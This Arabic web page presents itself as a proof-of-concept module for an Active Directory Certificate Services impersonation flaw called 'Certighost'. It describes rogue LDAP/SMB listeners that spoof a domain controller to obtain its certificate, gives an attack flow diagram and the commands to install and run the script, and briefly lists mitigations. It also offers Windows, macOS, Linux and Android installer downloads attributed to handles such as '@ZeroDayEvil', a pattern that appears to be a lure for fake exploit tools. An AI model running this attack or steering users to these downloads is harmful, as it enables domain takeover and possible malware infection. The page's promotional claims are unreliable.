
وحدة إثبات مفهوم لـ CVE-2026-54121 (Certighost)، تستغل التحقق من تسجيل AD CS عبر مستمعي LDAP/SMB المارقين لانتحال هوية وحدة تحكم المجال والتصعيد عبر PKINIT.
🛡 وحدة أداة الأمن بالذكاء الاصطناعي
CVE-2026-54121: انتحال هوية خدمات شهادات Active Directory (Certighost)
وحدة تدقيق أمني رسمية لمنظومة أداة الأمن بالذكاء الاصطناعي
🌐 عرض توضيحي على الويب • 📚 موقع المشروع • 💬 دردشة المجتمع
التنقل في الموقع: الرئيسية • التحديثات • التنزيلات • الوحدات
توفّر هذه الوحدة قدرات تشخيصية لـ CVE-2026-54121، الملقّبة بـ Certighost. توجد الثغرة داخل خدمات شهادات Active Directory (AD CS) خلال مرحلة التحقق من تسجيل شهادات حسابات الكمبيوتر.
يقوم المهاجم الذي يمتلك بيانات اعتماد نطاق عادية منخفضة الصلاحيات بإنشاء حساب كمبيوتر جديد وتقديم طلب شهادة يحتوي على سمات cdc (مستمع IP مُتحكَّم به) وrmd (FQDN وحدة التحكم بالمجال الهدف) المُتلاعَب بها. عندما تتصل سلطة الشهادة (CA) مرة أخرى للتحقق من هوية الجهاز، تقوم مستمعات LDAP (المنفذ 389) وSMB/LSA (المنفذ 445) الخبيثة بانتحال سمات هوية وحدة التحكم بالمجال الهدف (sAMAccountName، SID، dNSHostName). وهذا يخدع سلطة الشهادة لإصدار شهادة أصيلة لوحدة التحكم بالمجال، مما يسمح باختراق كامل للنطاق عبر PKINIT.
"صادِق كمصادقة جهاز، وارتقِ إلى النطاق بأكمله."
يتجاوز Certighost أذونات قوالب AD CS التقليدية عبر تسميم خط أنابيب تحليل الهوية لدى سلطة الشهادة. الحصول على شهادة صالحة لوحدة التحكم بالمجال يمنح مصادقة PKINIT فورية، مما ينتج عنه كل من ذاكرة تخزين مؤقت لبيانات اعتماد TGT (.ccache) وتجزئة NT لوحدة التحكم بالمجال الهدف.
graph TD
A[Low-Priv Domain User] -->|1. Create Computer Account| B[Domain Controller]
A -->|2. Start Rogue SMB 445 / LDAP 389 Listeners| C[Attacker Machine]
A -->|3. Submit Cert Request with cdc & rmd Attributes| D[Active Directory CA]
D -->|4. CA Lookups Connect to Rogue Listeners| C
C -->|5. Validate via Netlogon & Return Target DC Identity| D
D -->|6. Issue Valid DC Certificate .pfx| A
A -->|7. Perform PKINIT with DC Certificate| E[Full Domain Takeover / NT Hash Export]ms-DS-MachineAccountQuota على 0 لمنع المستخدمين غير الإداريين من إنشاء كائنات كمبيوتر جديدة.EDITF_ATTRIBUTESUBJECTALTNAME2 (ESC6) ما لم يكن مطلوبًا صراحةً.⚠️ مهم: صُمِّمت هذه الوحدة لإجراء اختبارات تشخيصية آمنة ضمن إطار عمل أداة الأمن بالذكاء الاصطناعي. نفّذها فقط ضد أهداف مُصرَّح بها وبصلاحيات إدارية مرتفعة.
لتنفيذ نصوص التشخيص والمراقبة، ثبّت إطار عمل أداة الأمن بالذكاء الاصطناعي الأساسي:
ثبّت مكتبات Python المطلوبة لمستمعات LDAP/SMB الخبيثة ومعالجة الشهادات:
# Install python dependencies
sudo pip install --break-system-packages git+https://github.com/fortra/impacket.git cryptography pyasn1 asn1crypto pycryptodome dnspython
# Execute Certighost proof-of-concept (Requires root for ports 389/445)
sudo python3 certighost.py -d playground.local -u lowpriv -p 'Password1234' --dc-ip 192.168.1.10وحدات فحص الثغرات، ونصوص إثبات المفهوم، ومستودعات البحث التي يصونها مجتمعنا:
4 وحدات@ZeroDayEvil
@ZeroDayEvil
@ZeroDayEvil
@ZeroDayVPN
3 وحدات@ZeroDayEvil
@ZeroDayVPN
@ZeroDayEvil
وحدتان@ZeroDayEvil
@ZeroDayVPN
تُقدَّم هذه الأداة والتحليل الأمني حصريًا لأغراض تدقيق الأنظمة المُصرَّح به، والبحث الدفاعي، ومهام اختبار الاختراق.
يُعدّ تنفيذ CVE-2026-54121 ضد بيئات النطاق دون إذن كتابي صريح من مالك النظام غير قانوني. لا يتحمّل المؤلفون أي مسؤولية عن الاختراق غير المُصرَّح به للنطاق، أو فقدان البيانات، أو تعطّل الأنظمة.
نرحّب بمساهمات مجتمع أبحاث الأمن! مجالات المساهمة الرئيسية:
أداة الأمن بالذكاء الاصطناعي — إعادة تصوّر سير عمل الطرفية والأتمتة لمتخصصي الأمن السيبراني.
| المواصفة | القيمة المُعيَّنة | ملاحظات |
|---|
| معرّف CVE | CVE-2026-54121 | انتحال هوية خدمات شهادات Active Directory |
| تصنيف الخطورة | حرجة (CVSS v3.1: 9.8) | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H |
| نوع الثغرة | CWE-287 / CWE-290 | مصادقة غير سليمة / تجاوز المصادقة عبر الانتحال |
| المكوّن المتأثر | خدمات شهادات Active Directory (AD CS) | تسجيل الشهادات وخط أنابيب التحقق من الهوية |
| ناقل الهجوم | الشبكة | يُنفَّذ عن بُعد عبر بروتوكولات SMB وLDAP وRPC |
| الصلاحيات المطلوبة | صلاحيات منخفضة | حساب مستخدم نطاق قياسي (القدرة على إضافة حسابات أجهزة) |
| نظام التشغيل / المنصة | الإصدار | البنية / الصيغة | تاريخ الإصدار | الحالة | رابط التنزيل |
|---|
| 🪟 Windows | v6.3.20 | مثبّت x64 (.exe) | 2026-09-08 | 🟢 الأحدث | تنزيل .exe |
| 🪟 Windows | v6.3.20 | محمول x64 (.tar.gz) | 2026-09-08 | 🟢 الأحدث | تنزيل .tar.gz |
| 🍏 macOS | v5.3.29 | Apple Silicon M1/M2/M3 (.dmg) | 2026-09-05 | 🟢 مستقر | تنزيل .dmg |
| 🐧 Linux | v5.3.27 | عالمي x64 (.tar.gz) | 2026-09-01 | 🟢 مستقر | تنزيل .tar.gz |
| 🤖 Android | v8a 5.3.27 | ARM64 APK (.apk) | 2026-09-01 | 🟢 مستقر | تنزيل .apk |